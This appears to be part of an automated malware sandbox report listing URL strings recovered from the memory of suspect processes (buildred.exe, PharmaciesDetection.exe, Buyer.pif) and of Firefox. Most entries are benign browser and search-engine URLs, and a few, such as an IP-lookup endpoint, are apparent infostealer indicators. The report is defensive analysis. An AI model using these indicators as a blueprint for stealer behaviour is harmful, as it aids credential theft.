Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676783589.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe, file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2914617240.00000261932BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2926539269.0000026194A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2945658971.000002640003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.0000026194615000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulN&
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulg
Source: file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441439634.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2808523111.0000026192480000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: buildred.exe, 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000028.00000002.2925172791.0000026194847000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946154664.00000DD94BB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2946900906.00002887A0504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
